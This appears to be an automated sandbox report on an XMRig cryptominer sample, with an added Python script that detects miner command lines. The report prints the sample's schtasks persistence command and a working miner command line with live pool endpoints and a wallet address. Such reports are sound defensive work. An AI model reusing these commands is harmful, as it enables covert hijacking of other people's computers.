                                                        Reputation: high

                                                        General

                                                        Start time: 18:20:08
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase: 0x7ff6de4a0000
                                                        File size: 226816 bytes
                                                        MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: high

                                                        General

                                                        Start time: 18:20:09
                                                        Start date: 01/11/2021
                                                        Path: C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Imagebase: 0x400000
                                                        File size: 2234368 bytes
                                                        MD5 hash: 0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 65%, Virustotal, Browse
                                                        • Detection: 31%, Metadefender, Browse
                                                        • Detection: 81%, ReversingLabs
                                                        Reputation: low

                                                        General

                                                        Start time: 18:20:10
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase: 0x7ff724c50000
                                                        File size: 625664 bytes
                                                        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: .Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.849031612.000002C960EA6000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.847850368.000002C9604A6000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation: high

                                                        General

                                                        Start time: 18:20:11
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase: 0x7ff622070000
                                                        File size: 273920 bytes
                                                        MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: high

                                                        General

                                                        Start time: 18:20:11
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase: 0x7ff724c50000
                                                        File size: 625664 bytes
                                                        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: high

                                                        General

                                                        Start time: 18:20:12
                                                        Start date: 01/11/2021
                                                        Path: C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Imagebase: 0x400000
                                                        File size: 2234368 bytes
                                                        MD5 hash: 0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: low

                                                        General

                                                        Start time: 18:20:13
                                                        Start date: 01/11/2021
                                                        Path: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
                                                        Imagebase: 0x400000
                                                        File size: 31232 bytes
                                                        MD5 hash: 2497F634A80476AE2EAE956D8B84528E
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 49%, Metadefender, Browse
                                                        • Detection: 82%, ReversingLabs
                                                        Reputation: low

                                                        General

                                                        Start time: 18:20:13
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase: 0x7ff724c50000
                                                        File size: 625664 bytes
                                                        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: .Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.732288392.000002A7830D1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation: high

                                                        General

                                                        Start time: 18:20:13
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: 'C:\Windows\System32\conhost.exe' '/sihost64'
                                                        Imagebase: 0x7ff724c50000
                                                        File size: 625664 bytes
                                                        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: .Net C# or VB.NET
                                                        Reputation: high

                                                        General

                                                        Start time: 18:20:18
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\explorer.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
                                                        Imagebase: 0x7ff6fee60000
                                                        File size: 3933184 bytes
                                                        MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.726457226.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.719362766.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation: high

                                                        General

                                                        Start time: 18:20:18
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\explorer.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
                                                        Imagebase: 0x7ff6fee60000
                                                        File size: 3933184 bytes
                                                        MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.744667827.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.825932798.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:high
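The command line recorded above for the injected explorer.exe is exactly the kind of evidence the PUA_Crypto_Mining_CommandLine_Indicators and Sigma Xmrig detections key on: pool endpoints, a Monero address as the login, the RandomX algorithm and a set of tuning flags, all attached to a Windows system image that never legitimately takes such arguments. The following is an added example, not code from the sample or from this report, showing how such a check can be written as a small triage script over a process command line. The option list, the address and endpoint regexes and the set of system images are assumptions of the example, not anything the report states; the sample input is the command line quoted above.

```python
import re

# Command line of the injected explorer.exe exactly as recorded in the report above;
# it serves as the sample input for the checks below.
SAMPLE_CMDLINE = (
    r"C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto "
    "--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr "
    "--cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 "
    "-o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 "
    "--user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ "
    "--pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100"
)

# Standard Monero address: 95 base58 characters with a leading '4' (assumption of this example).
MONERO_ADDR = re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$")
# host:port as given to -o/--url, optionally with a stratum scheme.
POOL = re.compile(r"^(?:stratum\+(?:tcp|ssl)://)?[A-Za-z0-9.\-]+:\d{2,5}$")

# Options whose value is either '--name=value' or the following token.
VALUE_OPTS = {"--algo", "-a", "--url", "-o", "--user", "-u", "--pass", "-p",
              "--cpu-max-threads-hint", "--threads", "-t"}
# Prefixes of the tuning/loader options seen on the recorded line; each one is a finding.
TUNING_PREFIXES = ("--randomx-", "--cuda-", "--cinit-", "--cpu-memory-pool", "--asm")
# Windows system images that never legitimately carry miner arguments (assumed list).
SYSTEM_IMAGES = {"explorer.exe", "svchost.exe", "conhost.exe", "dllhost.exe", "rundll32.exe"}


def analyze_cmdline(cmdline: str) -> dict:
    """Extract miner indicators from one process command line and return a verdict."""
    toks = cmdline.split()          # the recorded line has no quoted whitespace; see note below
    image = toks[0].strip("'\"").rsplit("\\", 1)[-1].lower() if toks else ""
    values, tuning = {}, []
    i = 1
    while i < len(toks):
        name, eq, val = toks[i].partition("=")
        if name in VALUE_OPTS:
            if not eq and i + 1 < len(toks):    # value supplied as the next token
                i += 1
                val = toks[i]
            values.setdefault(name, []).append(val.strip("'\""))
        elif name.startswith(TUNING_PREFIXES):
            tuning.append(name)
        i += 1

    algo = (values.get("--algo") or values.get("-a") or [None])[0]
    pools = [p for p in values.get("--url", []) + values.get("-o", []) if POOL.match(p)]
    wallet = next((u for u in values.get("--user", []) + values.get("-u", [])
                   if MONERO_ADDR.match(u)), None)

    findings = [f"tuning/loader option {t}" for t in tuning]
    if algo:
        findings.append(f"mining algorithm {algo}")
    if pools:
        findings.append(f"{len(pools)} pool endpoint(s): {', '.join(pools)}")
    if wallet:
        findings.append("Monero address supplied as --user")
    # A pool plus any of wallet/algorithm/tuning flags is enough to call it a miner.
    is_miner = bool(pools) and bool(wallet or algo or tuning)
    if is_miner and image in SYSTEM_IMAGES:
        findings.append(f"miner arguments on Windows system image {image}: "
                        "expect process injection rather than a renamed binary")
    return {"image": image, "algo": algo, "pools": pools, "wallet": wallet,
            "tuning": tuning, "findings": findings, "is_miner": is_miner}


if __name__ == "__main__":
    for line in analyze_cmdline(SAMPLE_CMDLINE)["findings"]:
        print(line)
```

The whitespace split is enough for this line; production code fed from Sysmon or EDR telemetry needs a Windows-aware argument parser, since Windows quoting rules differ from POSIX shells. The verdict is "this is a miner", not "this is malicious": the same script flags a user-installed xmrig.exe, and the system-image finding is what separates the injected case seen here from that.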

                                                        Disassembly

                                                        Code Analysis


                                                          Executed Functions

                                                          C-Code - Quality: 33%
                                                          			// Main routine of the sample (reached from E0040224F with argc/argv). It decodes several
                                                          			// constants at 0x403021..0x403051 through E00401000, formats a string with sprintf and
